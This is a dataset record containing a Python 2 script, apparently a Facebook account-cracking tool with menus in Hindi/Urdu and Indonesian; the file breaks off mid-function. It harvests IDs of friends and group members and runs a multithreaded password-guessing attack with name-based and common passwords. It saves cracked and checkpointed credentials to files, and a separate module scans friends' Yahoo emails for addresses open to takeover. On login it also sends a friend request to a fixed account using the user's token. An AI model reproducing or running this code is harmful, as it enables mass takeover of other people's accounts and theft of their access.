Dataset schema (one record per source file):

| Column | Type |
|---|---|
| blob_id | string (length 40) |
| directory_id | string (length 40) |
| path | string (length 5–283) |
| content_id | string (length 40) |
| detected_licenses | sequence (length 0–41) |
| license_type | string (2 classes) |
| repo_name | string (length 7–96) |
| snapshot_id | string (length 40) |
| revision_id | string (length 40) |
| branch_name | string (58 classes) |
| visit_date | timestamp[us] |
| revision_date | timestamp[us] |
| committer_date | timestamp[us] |
| github_id | int64 (12.7k–662M, nullable) |
| star_events_count | int64 (0–35.5k) |
| fork_events_count | int64 (0–20.6k) |
| gha_license_id | string (11 classes) |
| gha_event_created_at | timestamp[us] |
| gha_created_at | timestamp[us] |
| gha_language | string (43 classes) |
| src_encoding | string (9 classes) |
| language | string (1 class) |
| is_vendor | bool (2 classes) |
| is_generated | bool (2 classes) |
| length_bytes | int64 (7–5.88M) |
| extension | string (30 classes) |
| content | string (length 7–5.88M) |
| authors | sequence (length 1) |
| author | string (length 0–73) |
5199d29b7a9766ad46f93f5207fb801319b2a68f | 1676ac24240138302dfe0ce03d00478dde138491 | /aahil.py | 6180fe1b1260548f0dd9037e52c751f56f7c5a3a | [] | no_license | Blacktiger786/mr | fc550246d06ecd54204433f85ec66b37142d2e60 | 3b8d227ab7761f47e8bdca3831602a74569e5909 | refs/heads/master | 2022-04-20T20:35:32.752537 | 2020-04-18T06:31:28 | 2020-04-18T06:31:28 | 256,677,047 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,886 | py |
#!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
#### LOGO ####
logo = """
\033[1;91m _ ____
\033[1;91m | | |___ \
\033[1;92m ___| | ___ _ __ __) |_ __ Updated โญโก
\033[1;92m / __| |/ _ \| '_ \ |__ <| '__|
\033[1;93m | (__| | (_) | | | |___) | |
\033[1;93m \___|_|\___/|_| |_|____/|_|
\033[1;93m๐ฅโญโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโฎ๐ฅ
\033[0;94m โก โฏ ๐ฎ๐๐๐๐๐๐ โช ๐ธ๐.๐ฝ๐๐๐ ๐ฌ๐๐๐๐ โฌโก
\033[0;94m โก โฏ ๐๐๐๐๐๐๐ โช Aahil Creations โฌโก
\033[0;93m โก โฏ ๐ด๐ ๐รธ๐ ๐๐๐๐๐๐๐๐๐๐๐ ๐๐๐ ๐๐๐ ๐๐๐๐ ๐๐๐ โฌโก
\033[1;93m๐ฅโฐโฌโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโฌโฏ๐ฅ """
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;93mPlease Wait \x1b[1;93m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97m _ _ _
\033[1;97m /\ | | (_)| | VIRSON 0.2โก
\033[1;97m / \ __ _ | |__ _ | |
\033[1;97m / /\ \ / _` || '_ \ | || |
\033[1;97m / ____ \| (_| || | | || || |
\033[1;97m /_/ \_\\__,_||_| |_||_||_|"""
jalan("\033[1;96mโขโโขโโโโโโโโโโโโโขโโข\033[1;99mAahil\033[1;99mโขโโขโโโโโโโโโโโโโขโโข")
jalan("\033[1;96m ___ _ __ __ _ ___ ___ ")
jalan("\033[1;96m / _/| | /__\ | \| || __|| _ \ CLONE ALL COUNTRY")
jalan("\033[1;96m| \__| |_| \/ || | ' || _| | v / ")
jalan("\033[1;96m \__/|___|\__/ |_|\__||___||_|_\ ")
jalan("\033[1;97m INDIAN USER USE ANY PROXY TO CLONE")
jalan("\033[1;97m WIFI USER USE ANY PROXY TO CLONE")
jalan("\033[1;93m Welcome to Aahil Creations")
jalan("\033[1;96mโขโโขโโโโโโโโโโโขโโข\033[1;96mBlacktiger\033[1;96mโขโโขโโโโโโโโโโโขโโข")
CorrectUsername = "rana"
CorrectPassword = "rana"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m๐ \x1b[1;96mENTER Username \x1b[1;97mยปยป \x1b[1;97m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m๐ \x1b[1;96mENTER Password \x1b[1;97mยปยป \x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:love_hacker
time.sleep(2)
loop = 'false'
else:
print "\033[1;96mWrong Password"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "\033[1;96mWrong Username"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[โก] \x1b[1;93mLogin your new id \x1b[1;93m[โก]' )
id = raw_input('\033[1;963m[+] \x1b[0;34mEnter ID/Email \x1b[1;93m: \x1b[1;93m')
pwd = raw_input('\033[1;93m[+] \x1b[0;34mEnter Password \x1b[1;93m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[โ] \x1b[1;92mLogin Hogai'
os.system('xdg-open https://facebook.com/bhupinder.india2')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mAisa lagta hai apka account checkpoint pe hai")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email ghalat hai")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mAisa lagta hai apka account checkpoint pe hai"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97mโ\033[1;96m]\033[1;93m Nama \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97mโ\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;36m Hack Fb MBF"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;36m Group ki list dekho "
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;36m Yahoo clone "
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Logout "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
grupsaya()
elif unikers =="3":
yahoo()
elif unikers =="0":
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;36m Apni id ki friend list hack"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;36m Apny dost ki friend list hack"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;36m Apny facebook group ko hack kro"
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;36m list bana k hack kro"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[โบ] \033[1;93mBahir lejao ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;37mFriend ka ID code enter krein \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;93mNama teman\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan!"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[โบ] \033[1;93mMengambil ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
idg=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id="+idg+"&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
jalan('\033[1;96m[โบ] \033[1;93mMengambil ID \033[1;97m...')
re=requests.get('https://graph.facebook.com/"+idg+"/members?fields=name,id&limit=9999&access_token='+toket)
s=json.loads(re.text)
for p in s['data']:
id.append(p['id'])
elif peak =="4":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mMasukan nama file \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile tidak ditemukan'
raw_input('\n\x1b[1;96m[ \x1b[1;97mKembali \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal ID \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[โบ] \033[1;93mStart \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97mโธ\033[1;96m] \033[1;93mCrack \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['last_name']+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = ('indian')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = ('indian123')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = ('india123')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass8 = ('bhagwan')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mBerhasil\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8
oks.append(user+pass8)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCekpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass8
cek = open("out/super_cp.txt", "a")
cek.write(user+"|"+pass8+"\n")
cek.close()
cekpoint.append(user+pass8)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File tersimpan \033[1;91m: \033[1;97mout/super_cp.txt")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
super()
def grupsaya():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken tidak ditemukan"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
uh = requests.get('https://graph.facebook.com/me/groups?access_token='+toket)
gud = json.loads(uh.text)
for p in gud['data']:
nama = p["name"]
id = p["id"]
f=open('out/Grupid.txt','w')
listgrup.append(id)
f.write(id + '\n')
print "\033[1;96m[\033[1;92mGroup\033[1;96m]\x1b[1;97m "+str(id)+" \x1b[1;96m=>\x1b[1;97m "+str(nama)
print 42*"\033[1;96m="
print"\033[1;96m[+] \033[1;92mTotal Group \033[1;91m:\033[1;97m %s"%(len(listgrup))
print("\033[1;96m[+] \033[1;92mTersimpan \033[1;91m: \033[1;97mout/Grupid.txt")
f.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except (KeyboardInterrupt,EOFError):
print("\033[1;96m[!] \x1b[1;91mTerhenti")
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except KeyError:
os.remove('out/Grupid.txt')
print('\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan')
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;96m[โ] \x1b[1;91mTidak ada koneksi"
keluar()
except IOError:
print "\033[1;96m[!] \x1b[1;91mError"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def yahoo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Clone dari daftar teman"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Clone dari teman"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Clone dari member group"
print "\x1b[1;96m[\x1b[1;92m4\x1b[1;96m]\x1b[1;93m Clone dari file"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Kembali"
clone()
def clone():
embuh = raw_input("\n\x1b[1;97m >>> ")
if embuh =="":
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
elif embuh =="1":
clone_dari_daftar_teman()
elif embuh =="2":
clone_dari_teman()
elif embuh =="3":
clone_dari_member_group()
elif embuh =="4":
clone_dari_file()
elif embuh =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mIsi yang benar"
def clone_dari_daftar_teman():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token Invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
jalan('\033[1;96m[\x1b[1;97mโบ\x1b[1;96m] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;96m[\x1b[1;97mโบ\x1b[1;96m] \033[1;93mStart \033[1;97m...')
print ('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;92mVULNโ\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_teman():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mMasukan ID teman \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;93mNama\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mTeman tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[โบ] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/TemanMailVuln.txt','w')
jalan('\033[1;96m[โบ] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 43*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write("Nama: "+ nama +"ID :" + id +"Email: "+ mail + '\n')
print("\033[1;96m[\033[1;92mVULNโ\033[1;96m] \033[1;92m" +mail+" \033[1;96m=>\x1b[1;97m"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;92mSelesai \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;96m[+] \033[1;92mFile tersimpan \033[1;91m:\033[1;97m out/TemanMailVuln.txt"
save.close()
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
def clone_dari_member_group():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('clear')
print logo
mpsh = []
jml = 0
print 42*"\033[1;96m="
id=raw_input('\033[1;96m[+] \033[1;93mMasukan ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;96m[\033[1;97mโ\033[1;96m] \033[1;93mNama group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;96m[!] \x1b[1;91mGroup tidak ditemukan"
raw_input("\n\033[1;96m[\033[1;97mKembali\033[1;96m]")
menu()
jalan('\033[1;96m[โบ] \033[1;93mMengambil email \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;96m[โบ] \033[1;93mStart \033[1;97m...')
print('\x1b[1;96m[!] \x1b[1;93mStop CTRL+z')
print 42*"\033[1;96m="
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
